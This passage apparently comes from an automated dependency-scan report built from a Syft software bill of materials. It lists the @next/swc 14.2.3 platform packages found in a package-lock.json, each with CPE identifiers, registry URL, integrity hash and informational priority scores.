remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: bdb25bdc1adfe20f name: '@next/swc-darwin-arm64' version: 14.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@next\/swc-darwin-arm64:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-darwin-arm64:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_darwin_arm64:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_darwin_arm64:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-darwin:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-darwin:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_darwin:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_darwin:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40next/swc-darwin-arm64@14.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@next/swc-darwin-arm64/-/swc-darwin-arm64-14.2.3.tgz integrity: sha512-3pEYo/RaGqPP0YzwnlmPN2puaF2WMLM3apt5jLW2fFdXD9+pqcoTzRk+iZsf8ta7+quAe4Q6Ms0nR0SFGFdS1A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 297b85bfc16e4adc ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @next/swc-darwin-x64 14.2.3' title: '@next/swc-darwin-x64 14.2.3' description: 'Package discovered: @next/swc-darwin-x64 14.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b0a8be32ec095ef0 name: '@next/swc-darwin-x64' version: 14.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@next\/swc-darwin-x64:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-darwin-x64:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_darwin_x64:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_darwin_x64:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-darwin:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-darwin:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_darwin:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_darwin:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40next/swc-darwin-x64@14.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@next/swc-darwin-x64/-/swc-darwin-x64-14.2.3.tgz integrity: sha512-6adp7waE6P1TYFSXpY366xwsOnEXM+y1kgRpjSRVI2CBDOcbRjsJ67Z6EgKIqWIue52d2q/Mx8g9MszARj8IEA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: eaf37f3f72892d80 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @next/swc-linux-arm64-gnu 14.2.3' title: '@next/swc-linux-arm64-gnu 14.2.3' description: 'Package discovered: @next/swc-linux-arm64-gnu 14.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b768ca89954904c7 name: '@next/swc-linux-arm64-gnu' version: 14.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@next\/swc-linux-arm64-gnu:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux-arm64-gnu:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux_arm64_gnu:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux_arm64_gnu:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux-arm64:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux-arm64:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux_arm64:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux_arm64:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40next/swc-linux-arm64-gnu@14.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@next/swc-linux-arm64-gnu/-/swc-linux-arm64-gnu-14.2.3.tgz integrity: sha512-cuzCE/1G0ZSnTAHJPUT1rPgQx1w5tzSX7POXSLaS7w2nIUJUD+e25QoXD/hMfxbsT9rslEXugWypJMILBj/QsA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 27ac7498beafdc1b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @next/swc-linux-arm64-musl 14.2.3' title: '@next/swc-linux-arm64-musl 14.2.3' description: 'Package discovered: @next/swc-linux-arm64-musl 14.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f485e6463dfab8af name: '@next/swc-linux-arm64-musl' version: 14.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@next\/swc-linux-arm64-musl:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux-arm64-musl:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux_arm64_musl:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux_arm64_musl:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux-arm64:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux-arm64:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux_arm64:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux_arm64:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40next/swc-linux-arm64-musl@14.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@next/swc-linux-arm64-musl/-/swc-linux-arm64-musl-14.2.3.tgz integrity: sha512-0D4/oMM2Y9Ta3nGuCcQN8jjJjmDPYpHX9OJzqk42NZGJocU2MqhBq5tWkJrUQOQY9N+In9xOdymzapM09GeiZw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6ebdba72ca21b201 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @next/swc-linux-x64-gnu 14.2.3' title: '@next/swc-linux-x64-gnu 14.2.3' description: 'Package discovered: @next/swc-linux-x64-gnu 14.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 1a0b07449dd69139 name: '@next/swc-linux-x64-gnu' version: 14.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@next\/swc-linux-x64-gnu:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux-x64-gnu:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux_x64_gnu:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux_x64_gnu:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux-x64:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux-x64:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux_x64:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux_x64:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40next/swc-linux-x64-gnu@14.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@next/swc-linux-x64-gnu/-/swc-linux-x64-gnu-14.2.3.tgz integrity: sha512-ENPiNnBNDInBLyUU5ii8PMQh+4XLr4pG51tOp6aJ9xqFQ2iRI6IH0Ds2yJkAzNV1CfyagcyzPfROMViS2wOZ9w== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: dc907ac1b205061b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @next/swc-linux-x64-musl 14.2.3' title: '@next/swc-linux-x64-musl 14.2.3' description: 'Package discovered: @next/swc-linux-x64-musl 14.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2ac68dfe221aa840 name: '@next/swc-linux-x64-musl' version: 14.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@next\/swc-linux-x64-musl:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux-x64-musl:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux_x64_musl:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux_x64_musl:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux-x64:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux-x64:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux_x64:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux_x64:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40next/swc-linux-x64-musl@14.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@next/swc-linux-x64-musl/-/swc-linux-x64-musl-14.2.3.tgz integrity: sha512-BTAbq0LnCbF5MtoM7I/9UeUu/8ZBY0i8SFjUMCbPDOLv+un67e2JgyN4pmgfXBwy/I+RHu8q+k+MCkDN6P9ViQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1f0b6c5423b99cbb ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @next/swc-win32-arm64-msvc 14.2.3' title: '@next/swc-win32-arm64-msvc 14.2.3' description: 'Package discovered: @next/swc-win32-arm64-msvc 14.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f14dd9ed0ebaa5a4 name: '@next/swc-win32-arm64-msvc' version: 14.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@next\/swc-win32-arm64-msvc:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-win32-arm64-msvc:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32_arm64_msvc:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32_arm64_msvc:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-win32-arm64:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-win32-arm64:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32_arm64:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32_arm64:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40next/swc-win32-arm64-msvc@14.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@next/swc-win32-arm64-msvc/-/swc-win32-arm64-msvc-14.2.3.tgz integrity: sha512-AEHIw/dhAMLNFJFJIJIyOFDzrzI5bAjI9J26gbO5xhAKHYTZ9Or04BesFPXiAYXDNdrwTP2dQceYA4dL1geu8A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: de3c183aece29806 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @next/swc-win32-ia32-msvc 14.2.3' title: '@next/swc-win32-ia32-msvc 14.2.3' description: 'Package discovered: @next/swc-win32-ia32-msvc 14.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0272e47fa12e3e5d name: '@next/swc-win32-ia32-msvc' version: 14.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@next\/swc-win32-ia32-msvc:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-win32-ia32-msvc:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32_ia32_msvc:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32_ia32_msvc:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-win32-ia32:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-win32-ia32:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32_ia32:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32_ia32:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40next/swc-win32-ia32-msvc@14.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@next/swc-win32-ia32-msvc/-/swc-win32-ia32-msvc-14.2.3.tgz integrity: sha512-vga40n1q6aYb0CLrM+eEmisfKCR45ixQYXuBXxOOmmoV8sYST9k7E3US32FsY+CkkF7NtzdcebiFT4CHuMSyZw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 42051f1b01ab97d3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @next/swc-win32-x64-msvc 14.2.3' title: '@next/swc-win32-x64-msvc 14.2.3' description: 'Package discovered: @next/swc-win32-x64-msvc 14.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3812cfa26422b0fa name: '@next/swc-win32-x64-msvc' version: 14.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@next\/swc-win32-x64-msvc:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-win32-x64-msvc:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32_x64_msvc:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32_x64_msvc:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-win32-x64:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-win32-x64:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32_x64:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32_x64:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40next/swc-win32-x64-msvc@14.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@next/swc-win32-x64-msvc/-/swc-win32-x64-msvc-14.2.3.tgz integrity: sha512-Q1/zm43RWynxrO7lW4ehciQVj+5ePBhOK+/K2P7pLFX3JaJ/IZVC69SHidrmZSOkqz7ECIOhhy7XhAFG4JYyHA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 